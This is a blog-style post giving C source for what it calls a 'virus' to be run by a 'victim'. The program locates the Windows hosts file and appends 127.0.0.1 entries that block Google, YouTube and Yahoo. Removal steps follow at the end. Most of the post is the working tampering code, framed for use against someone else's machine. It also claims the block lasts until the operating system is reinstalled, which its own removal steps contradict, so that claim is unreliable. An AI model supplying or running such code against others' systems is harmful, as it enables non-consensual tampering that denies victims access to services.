virus coading for blocking websites

.This virus has been exclusively created in ‘C’ . So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able tosurf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox . So once blocked, the site will not appear in any of the browser program. NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ? Here is the sourcecode of the virus. #include #include #include char site_list[6][30]={ “google.com”, “www.google.com”, “youtube.com”, “www.youtube.com”, “yahoo.com”, “www.yahoo.com” }; char ip[12]=”127.0.0.1″; FILE *target; int find_root(void); void block_site(void); int find_root() { int done; struct ffblk ffblk;//File block structure done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”); /*to open the file*/ return 1; } done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”); /*to open the file*/ return 1; } done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”); /*to open the file*/ return 1; } done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”); /*to open the file*/ return 1; } else return 0; } void block_site() { int i; fseek(target,0,SEEK_END); /*to move to the end of the file*/ fprintf(target,”\n”); for(i=0;i<6;i++) fprintf(target,”%s\t%s\n”,ip,site_list[i]); fclose(target); } void main() { int success=0; success=find_root(); if(success) block_site(); } 1. To test, run the compiled module. It will block the sites that is listed in the source code. 2. Once you run the file block_Site.exe , restart your browser program. Then, type the URL of the blocked site andyou’ll see the browser showingerror “ Page cannot displayed “. 3. To remove the virus type the following the Run. %windir%\system32\drivers\etc 4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this 127.0.0.1 google.com 5. Delete all such entries which contain the names of blocked site